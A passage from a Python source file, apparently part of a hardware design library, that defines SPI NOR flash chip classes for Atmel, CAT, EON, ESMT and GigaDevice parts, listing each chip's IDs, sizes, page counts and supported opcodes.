name = "at25fs040"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT25SF041(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x8401
name = "at25sf041"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25SF081(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x8501
name = "at25sf081"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25SF161(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x8601
name = "at25sf161"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25SF321(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x8701
name = "at25sf321"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25SL128A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4218
name = "at25sl128a"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class AT25SL321(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4216
name = "at25sl321"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class AT26DF041(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4400
name = "at26df041"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT26DF081A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4501
name = "at26df081a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT26DF161(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4600
name = "at26df161"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT26DF161A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4601
name = "at26df161a"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT26DF321(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4700
name = "at26df321"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT26F004(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0400
name = "at26f004"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT45DB011D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2200
name = "at45db011d"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT45DB021D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2300
name = "at45db021d"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT45DB041D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2400
name = "at45db041d"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT45DB081D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2500
name = "at45db081d"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT45DB161D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2600
name = "at45db161d"
total_size = 2097152 # bytes
page_size = 512 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT45DB321D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2701
name = "at45db321d"
total_size = 4194304 # bytes
page_size = 512 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT45DB321E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2700
name = "at45db321e"
total_size = 4194304 # bytes
page_size = 512 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT45DB642D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2800
name = "at45db642d"
total_size = 8388608 # bytes
page_size = 1024 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class CAT25128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "cat25128"
total_size = 16384 # bytes
page_size = 64 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class CAT25C03(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "cat25c03"
total_size = 256 # bytes
page_size = 16 # bytes
total_pages = 16
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class CAT25C09(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "cat25c09"
total_size = 1024 # bytes
page_size = 32 # bytes
total_pages = 32
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class CAT25C11(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "cat25c11"
total_size = 128 # bytes
page_size = 16 # bytes
total_pages = 8
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class CAT25C17(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "cat25c17"
total_size = 2048 # bytes
page_size = 32 # bytes
total_pages = 64
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class EN25F32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x3116
name = "en25f32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25P32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x2016
name = "en25p32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25P64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x2017
name = "en25p64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25Q32B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x3016
name = "en25q32b"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25Q64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x3017
name = "en25q64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25Q80A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x3014
name = "en25q80a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class EN25QH128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x7018
name = "en25qh128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25QH16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x7015
name = "en25qh16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class EN25QH256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x7019
name = "en25qh256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25QH32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x7016
name = "en25qh32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class EN25QH64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x7017
name = "en25qh64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class EN25S64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.EON
device_id = 0x3817
name = "en25s64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class F25L008A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ESMT
device_id = 0x2014
name = "f25l008a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class F25L32PA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ESMT
device_id = 0x2016
name = "f25l32pa"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class F25L32QA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ESMT
device_id = 0x4116
name = "f25l32qa"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class F25L64QA(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ESMT
device_id = 0x4117
name = "f25l64qa"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class GD25LQ128C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6018
name = "gd25lq128c"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25LQ128D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6018
name = "gd25lq128d"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25LQ16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6015
name = "gd25lq16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25LQ32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6016
name = "gd25lq32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25LQ40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6013
name = "gd25lq40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25LQ64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6017
name = "gd25lq64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25LQ64B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6017
name = "gd25lq64b"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25LQ64C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6017
name = "gd25lq64c"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25LQ80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6014
name = "gd25lq80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q10(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4011
name = "gd25q10"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q127C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4018
name = "gd25q127c"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4018
name = "gd25q128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q128C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4018
name = "gd25q128c"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4015
name = "gd25q16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q16B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4015
name = "gd25q16b"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q16C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4015
name = "gd25q16c"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q20(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4012
name = "gd25q20"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q20B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4012
name = "gd25q20b"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4019
name = "gd25q256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class GD25Q256C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4019
name = "gd25q256c"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q256D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4019
name = "gd25q256d"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class GD25Q32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4016
name = "gd25q32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q32B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4016
name = "gd25q32b"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q32C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4016
name = "gd25q32c"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4013
name = "gd25q40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q40B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4013
name = "gd25q40b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4010
name = "gd25q512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q512MC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4020
name = "gd25q512mc"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4017
name = "gd25q64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25Q64B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4017
name = "gd25q64b"
total_size = 8388608 # bytes
